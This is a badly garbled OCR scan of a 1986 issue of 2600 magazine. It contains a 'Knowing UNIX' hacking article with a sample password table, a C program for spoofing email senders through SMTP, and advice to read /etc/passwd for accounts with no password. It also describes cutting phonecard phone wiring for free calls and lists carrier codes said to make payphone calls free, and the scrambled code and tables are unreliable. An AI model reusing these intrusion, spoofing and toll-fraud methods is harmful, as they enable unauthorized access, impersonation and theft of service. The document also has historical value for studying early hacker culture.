2600 3-8 PDF
2600 3-8 PDF
2600 3-8 PDF
AUGUST, 1986
HANG
UP
$2
KNOWING UNIX
by The Kid & Co.
The UNIX operating system is popular among most major
universities and companies such as AT&T. Learning how to
hack and use UNIX is important to any serious phone phreak
or hacker.
UNIX is a marvelous system which exists in many different
forms: UNIX Release 7. UNIX 4.2BSD. UNIX System V.
Currently. efforts are underway to make all systems conform to
the UNIX System V interface standards. This will make the
jobs of programming Unix systems and hacking them much
easier since everything will be "compatible." The techniques I
am about to discuss should work under the two most popular
versions-UNIX System V and UNIX 4.2BSD. The UNIX
operating system has a reputation of not being very secure. yet
many attempts have been made to make it that way. Many of
them have been successful. Now let us embark on our quest for
root (super user privileges).
In order to hack a UNIX system. you must learn how to
identify one. UNIX systems all have the same login and
password prompts. These prompts appear to be unique to this
system. therefore it is not even necessary to penetrate the system
to identify it. The login prompts shown below are the standard
prompts:
login:
Password:
Password
superusr
hardware
gthgth
len123
Comments
The Super User Account
Field Maintenance (has root privs)
Average user (notice the pattern)
Another average user
3-57
The $ is the command prompt. Once you have this. you are
ready to start hacking away. First we will learn how to use the
tel net program to send mail to anyone on the system without
having your hacked account's username attached to it! You can
even make the mail look like it came from anyone on the system
or even from another system! Below we see a C program which
allows you to do this in a nice neat way:
lIinclude (stdio.h) fuse 'greater than, less than' brackets on this line
instead of parenthesesf
main(argc,argv)
char *argv{];
int argc;
( fuse an open squiggly bracket here]
FILE *popenO, *fp;
char ch, to[SI], fromrSI], subject[SI];
if(argc != 2)
( fuse an open squiggly bracket here]
printf("To: ");
gets(to);
) fuse a closed squiggly bracket here]
else
strcpy( to, argv{ I]);
printf("From: ");
gets(from);
printf("Subject: ");
gets( subject);
fp=popen("telnet hubcap 25 ))/dev/null","w"); fuse two 'greater
than' signs before the '/ dev 1
fprintf(fp,"mail from: %s/n",from); freplace slashes with
backslashes]
fprintf(fp,"rcpt to: %s/n", to); fsame as above]
fprintf(fp,"data/nSubject: %s/n/n",subject); fsame as above]
whilech=getchar()) != EOF) fuse two 'less than' signs after the
'while 1
fputc( ch,fp);
fputs("/n./nquit/n",fp); freplace slashes with backslashes]
pclose(fp);
) fuse a closed squiggly bracket heref
-0
fakemail fakemail.c
To run the program. just type fakemail and it will run and
prompt you. To terminate the message just type a control-D
(the UNIX EOF mark). You can have a lot of fun confusing
users by sending mail which appears to be from someone of
importance like "root" or other important users.
All UNIX operating systems allow all users to look at the
password file. Unfortunately the passwords are all encrypted.
One can look at this file by typing "cat! etc! passwd" from the $
prompt. Although you cannot get the actual passwords from
this file you can get a list of every user on the system and a list of
those users which do not have any passwords. If a user does not
have a password, the encrypted password field will be null. The
(continued on page 3-64)
A Trip To England
by John Drake
The follm... ing article comes to us from a writer who is
spendi~g some time in the United Kingdom. We welcome
future contributions from other writers in other countries.
Please contact us if you have something to offer.
Phone Card Phones
British Telecom is trying to increase the number of these
telephone booths throughout England since there is no money
involved. and thus no reason to break into them. Phone cards
are the same size as credit cards but they are green on black
plastic base. The units of each card are divided up into two
tracks of 100 units. Cards come in denominations of 10. 20, 50.
100, and 200 units. One unit is the same as 10 pence. To use the
other track on the card (if there is one) you simply turn it
a round and insert the opposite long length of the card into the
phone when the first track is all used up.
The phone "burns off" a unit at a timed interval which is
determined by the number you dialed. You can make
international calls from these phones. Free calls locally, longdistance. or international can be made from these phones by
disconnecting (cutting the wire or inserting a switch) the right
wire that contains the incoming timing signals. The wires are
color coded but BT (British Telecom) constantly changes this
color coding. You can use a voltmeter to deduce which wire you
have to cut. The problem arises that the wire is usually hidden
and protected unless it's in a school or in a building as opposed
to a phone booth. You can always disconnect it at its source
which is inside the phone. It stands to reason that since the
phonecard phones contain no money that the locks will be lax
or. easier yet, standardized for all phones. Once inside. you can
disconnect the wire going into the write head.
There is such a phone at an international school in London.
The wires of the phone are very bare and I believe that someone
at the school has figured out which is the right wire to cut. The
students lJave been making free international phone calls
around the world for several months now. British Telecom has
been around to fix the phone several times to no avail. Finally,
two weeks ago, they cut all the wires and left the phone for dead.
During the past week they have reconnected the phone and for
the time being it is burning off the credits when you make a call.
The wires going into the phone are still bare ....
Modem Standards
Prestel's odd standard of 1200175 has carried over to most
other non-Prestel systems. This includes mainframes,
Viewdata, and even some BBS's. 300/300 (not U.S.
compatible) modems are becoming more popular as are
1200/1200 (U.S. compatible). Other speed configurations are
1200175 Viewdata and 1200 Spectrum. There isa device which
clips onto the modem port and that acts as a buffer for your
1200 baud modem and makes it compatible with the 1200;75
computers here.
U.K. Operator Numbers
999 Emergencies--fire, police, ambulance, cave rescue. coast
guard, and mountain rescue
142 Information for London Postal Area
192 Information for numbers outside London
100 Operator Services-alarm calls. advice of duration &
charge. credit card calls, fixed time calls. free fone calls.
personal calls. international calls, transferred charge calls,
subscriber controlled transfer
151 Faults-repair service
193 International Telegrams-send to most countries
100 Maritime Services-ships' telegram serVice, ships'
telephone service
155 Inmarsat Satellite Service
3-58
--- =-=
- -- ---=-_.
-===-=-=
------- - --- - ===-=-=-=
= = = === =
-----=:--=
Phone Fraud in Governor's House
Philatll.'lrtua
Inuutn~r
~=
VSATnda'"
.IC'r..C'~,' Journal
~trett
Journal
~e\\~ay
The 911 operators have learned that when they get a call and
hear no voice on the line. a cordless phone is ftequently at fault.,
A rogue phone's dialing system is apparently triggered by low
batteries. or by interference from household gadgets such as
microwave ovens. fluorescent lights. hair dryers. and garagedoor openers. Three-digit numbers are hit most often (411 for
directory assistance also gets such calls).
For emergency operators. the problem is more than a
nuisance. Silent calls must be traced. in case a human rather
than a phantom needs help.
10007
10054
10066
10080
10084
10085
10203
10211
10220
10221
10222
10223
10235
10288
10333
10366
10444
10464
10488
10777
10800
10824
10850
10855
10888
2600
IISS~
0749-385\)
7213
4111
4835
7000
1169
6240
onl y)
0050
0300
1985
[eastern cities]
[Southern NJl
8888
3000
4949
1676
1171
6900,
2001
[Northern NJl
[DC Metro area]
Cno auto EA. need acct]
Phonecard
I Lift the receiver
and listen fnr dial
tone (continuous
purring or new dial
tone - a high
pitched hum).
BBS Operator
Tom Bllch
Cartoonist
Dan Holder
... ~
...
.~
Follow-on calls.
II \ (Ill !l;l\e ullused units remaining
, "I ;1 (;1'" I ;lnd YOU wish to make a net\'
(,ill, ti,) Il( ,t H'l)bn' tlte rl'lci\er. In'itcad,
hl'll'lh dcpress ;lIld release the reccivcr
resl As S"<11l ;IS \IlU hC;lr the dial tone
..gain. IIHI (;1I111U\.;(, \"Illr ncxt call
(sec pURe
.\-61
Thil il a lilt of area codel and the nUlber of exchanges bein, used in each one.
It will give an idea of what area codes are filling u~, as we I as which ones
are unused. This list cOles to us frol Telecol Diges , via Private Sector.
602
440
NPA COUNT
COMMENTS
603
193
604
480
201
North Jersey. Getting right up there.
543
605
310
437
202
240
606
203
349
607
146
204
308
60B
210
205
522
609
204
206
431
610
0
306
207
612
424
208
246
220
613
209
257
614
338
467
212
615
430
LOI Angeles already split off B18.
213
524
616
317
214
ADallas split is rUlored soon.
542
617
533
E. "ass - splitting off 508 in 1988
215
4Bl
61B
300
216
477
619
329
217
325
701
333
21B
267
702
195
219
307
703
415
301
Maryland. Busi er than 617.
53B
704
265
Delaware. Every state gets one, y'know.
302
73
705
239
557
Colorado has been growing
303
706
96
Northwest Mexico hack, not a real NPA
304
29B
707
145
305
540
"i ali too.
70B
0
306
416
709
237
lIyo.ing.
307
133
710
0
Unlisted code used for AT'T Governlent services.
308
IB6
712
265
309
237
713
414
640
IIhy hasn't Chicago split yet?
312
714
364
313
504
715
28B
314
454
716
322
315
228
717
410
316
332
718
294
317
325
719
0
31B
298
801
265
319
308
802
167
401
Rhode Island.
lOB
B03
396
402
385
B04
371
403
544
Alberta and sOle NIIT - Canada's busiest
B05
193
404
456
806
225
405
462
B07
97
406
II. Ontario - another waste.
316
B08
163
407
0
B09
340
40B
216
810
0
409
255
B12
243
410
0
B13
344
412
377
B14
237
413
109
II. "als - what a waste of a good code!
B15
255
414
378
B16
401
415
483
San Francisco, also rUlored for split.
416
433
B17
381
417
IB1
BIB
240
41B
327
819
282
419
304
900
24
501
480
901
178
502
902
310
221
503
441
903
0
504
267
904
356
905
505
261
206
506
143
906
109
Upper Michigan, tied with 413.
507
907
249
340
SOB
0
90B
0
909
509
213
0
512
910
501
San Antoni 0, TX.
0
912
513
396
270
514
913
399
363
914
256
515
377
915
257
516
283
916
319
285
517
917
0
518
211
91B
257
519
286
919
510
North Carolina's growing quickly.
358
601
3-62
SYSTEf:1I1T~[I1LL Y SPEI1K~~[j
USSR Computer Hungry
long hland
~ewo;,da\
l1SA Today
ATM's in China!
Comhined New" Source ..
r\ewsda~
Just a year after the New York Cash Exchange was formed.
the svstem that lets customers of one bank use automatic tellers
at competing banks has virtually run out of institutions to
recruit.
The regional system now has 1.225 machines and 4.2 million
customers, making it one of the largest in the nation. The 55
institutions set to join will boost NYCE to 2.000 machines and
6.5 million customers, with a total of 80 institutions in eight
states, the District of Columbia, and Puerto Rico.
The system's chief New York rival is Citibank. which has its
own network of 626 machines and 1.5 million card-holders.
Citibank has shown little interest in joining NYCE.
NYCE may try out a new project-a debit-card system. If
such a system were in place, a customer could buy clothing at a
local department store using a bank card. and a sales clerk
could deduct the purchase price right from the customer's
checking account.
TV Blue Boxes
Radio Electronic,
3-63
1"\('\\
York Time"
"Debugging" Phones
It may not be what the phone company had in mind when it
came up with the memorable slogan "Reach out and touch
someone." but a tiny company called BioHygenix Inc. plans to
publicize a list of unsavory bacteria and fungi that it says
inhabit the mouth and earpieces of most telephones.
The Fremont (C A) startup. of course. is providing more than
a public service. It has a product: a patented plastic telephone
cover impregnated with vinyzene. an antimicrobial preparation
developed by Morton Thiokol Inc.
UNIX
letters
Stake Out
Dear Readers:
Last month. rou read abollt the 'free phones of ph ill\". "
Chester Holmes told you about free calls from \'Grious
pOI phones that have equal access.
One of our writers was on a recent trip across the countrr.
and he had an opportunity to test Mr. Holmes' discovery alit in
other cities around the nation.
In ChicaRo and Los AnReles. for example. pay phone calls
are free when one simpll' chooses an alternate carrier before
dialinR 10444. 10777, and 10888 worked. A more complete list
(filrmshed br Kid & Co.) can be found in this month's 2600
Information Bureau.
For rou Telco executives-you should realize that
Philadelphia, ChicaRo, and Los AnReles are amonR the largest
cities in this countn' and represent a very larRe hole to patch
(not to mention the rest of the free world).
EQUIPMENT
Security, Privacy, Police
Surveillance, Countermeasures, Telephone
BOOKS
FULL DISCLOSURE
SHERWOOD COMMUNICATIONS
])v y.::,u lin'_'w WiLLI. IS nmlly gOing, Oll ill the world lod.Jy1 When yuu few
yuur d ..uly llcw,::>paper you ouly get. P~lIt. of the !:>lOry. In the u00k Mt'J."a .\/OflO
I!vl~, Ikn B:.I~dil:Lall dcscnucu II. L1!1~ W;IY
Philmont Commons
2789 Philmont Avenue Suite III 08T
Huntingdon Valley, PA 19006
I1!J
lilt: I~u~/ic
vi
Ihcy "llut
l'ltc:rlod:td
1I1(11.il.ll: juJu,'nu
The mell and WOllltll who
AJlt1ulry of JII!urmalulfi
u.ilA olhtr
It
certail1 that Full ni:JCl03urc tills a gap wlthm our soclety_ There
Computer Low
Telecom
Computer Security
User Suggestions
Radio Commun.
IS
In
our soclet.y
Dj~cI~urc
1>lta.$t
tol.tr Illy
l J SaA1l-'le
~
Telecom Digest
Media/News
Networking
Info ~trieval
BBS Advertising
I:)
lIet:u f,:,r a puulic&.tlon that throws light ou all llle acuvities of government orgaulz:.ttlons ti.:.J.t form a. :;taw within a !jute Since the first edition of Full Di~
dOlHII'C lIIformed lUi rcadels ahout auuses, evil and unlawful adivilles of
~e\'crnnll'1Lld tlqr..ulmclIki, Full Dbdo~JUrc h~ c.:cr1alllly become recognized
'uilurt . .. "
now
:\.dJrus: _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ __
Cily/SlaltjZiv - - - - - - - - - - - - - - - - - -
201-366-4431 (300/1200)
NOli..;~: ollr
S~l-t
3-64
~1i<.:higiLn.